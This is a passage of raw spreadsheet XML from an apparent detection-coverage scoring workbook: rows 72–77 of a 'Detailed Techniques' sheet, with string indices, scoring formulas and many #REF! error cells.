        <v>9</v>
      </c>
      <c r="C72" s="8" t="s">
        <v>570</v>
      </c>
      <c r="D72" s="10" t="s">
        <v>571</v>
      </c>
      <c r="E72" s="10" t="s">
        <v>572</v>
      </c>
      <c r="F72" s="10" t="s">
        <v>573</v>
      </c>
      <c r="G72" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K72,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H72" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I72" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J72" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K72" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L72" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M72" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N72" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O72" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P72" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q72" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R72" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S72" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T72" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U72" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V72" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W72" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X72" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F72&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F72))-LEN(SUBSTITUTE(TRIM(F72),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y72" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="73" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A73" s="8" t="s">
        <v>123</v>
      </c>
      <c r="B73" s="8" t="s">
        <v>401</v>
      </c>
      <c r="C73" s="8" t="s">
        <v>574</v>
      </c>
      <c r="D73" s="10" t="s">
        <v>575</v>
      </c>
      <c r="E73" s="10" t="s">
        <v>576</v>
      </c>
      <c r="F73" s="10" t="s">
        <v>577</v>
      </c>
      <c r="G73" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K73,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H73" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I73" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J73" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K73" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L73" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M73" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N73" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O73" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P73" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q73" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R73" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S73" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T73" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U73" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V73" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W73" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X73" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F73&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F73))-LEN(SUBSTITUTE(TRIM(F73),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y73" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="74" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A74" s="8" t="s">
        <v>113</v>
      </c>
      <c r="B74" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C74" s="8" t="s">
        <v>578</v>
      </c>
      <c r="D74" s="10" t="s">
        <v>579</v>
      </c>
      <c r="E74" s="10" t="s">
        <v>580</v>
      </c>
      <c r="F74" s="10" t="s">
        <v>581</v>
      </c>
      <c r="G74" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K74,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H74" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I74" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J74" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K74" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L74" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M74" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N74" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O74" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P74" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q74" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R74" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S74" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T74" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U74" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V74" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W74" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X74" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F74&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F74))-LEN(SUBSTITUTE(TRIM(F74),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y74" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="75" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A75" s="8" t="s">
        <v>76</v>
      </c>
      <c r="B75" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C75" s="8" t="s">
        <v>582</v>
      </c>
      <c r="D75" s="10" t="s">
        <v>583</v>
      </c>
      <c r="E75" s="10" t="s">
        <v>584</v>
      </c>
      <c r="F75" s="10" t="s">
        <v>425</v>
      </c>
      <c r="G75" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K75,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H75" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I75" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J75" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K75" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L75" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M75" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N75" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O75" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P75" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q75" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R75" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S75" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T75" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U75" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V75" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W75" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X75" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F75&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F75))-LEN(SUBSTITUTE(TRIM(F75),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y75" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="76" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A76" s="8" t="s">
        <v>53</v>
      </c>
      <c r="B76" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C76" s="8" t="s">
        <v>585</v>
      </c>
      <c r="D76" s="10" t="s">
        <v>586</v>
      </c>
      <c r="E76" s="10" t="s">
        <v>587</v>
      </c>
      <c r="F76" s="10" t="s">
        <v>588</v>
      </c>
      <c r="G76" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K76,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H76" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I76" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J76" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K76" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L76" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M76" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N76" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O76" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P76" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q76" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R76" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S76" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T76" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U76" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V76" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W76" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X76" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F76&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F76))-LEN(SUBSTITUTE(TRIM(F76),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y76" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="77" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A77" s="8" t="s">
        <v>74</v>
      </c>
      <c r="B77" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C77" s="8" t="s">
        <v>589</v>
      </c>
      <c r="D77" s="10" t="s">
        <v>590</v>
      </c>
      <c r="E77" s="10" t="s">
        <v>591</v>
      </c>
      <c r="F77" s="10" t="s">
        <v>592</v>
      </c>
      <c r="G77" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K77,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H77" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I77" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J77" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K77" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L77" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M77" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N77" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O77" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P77" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q77" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R77" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S77" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T77" s="20" t="e">
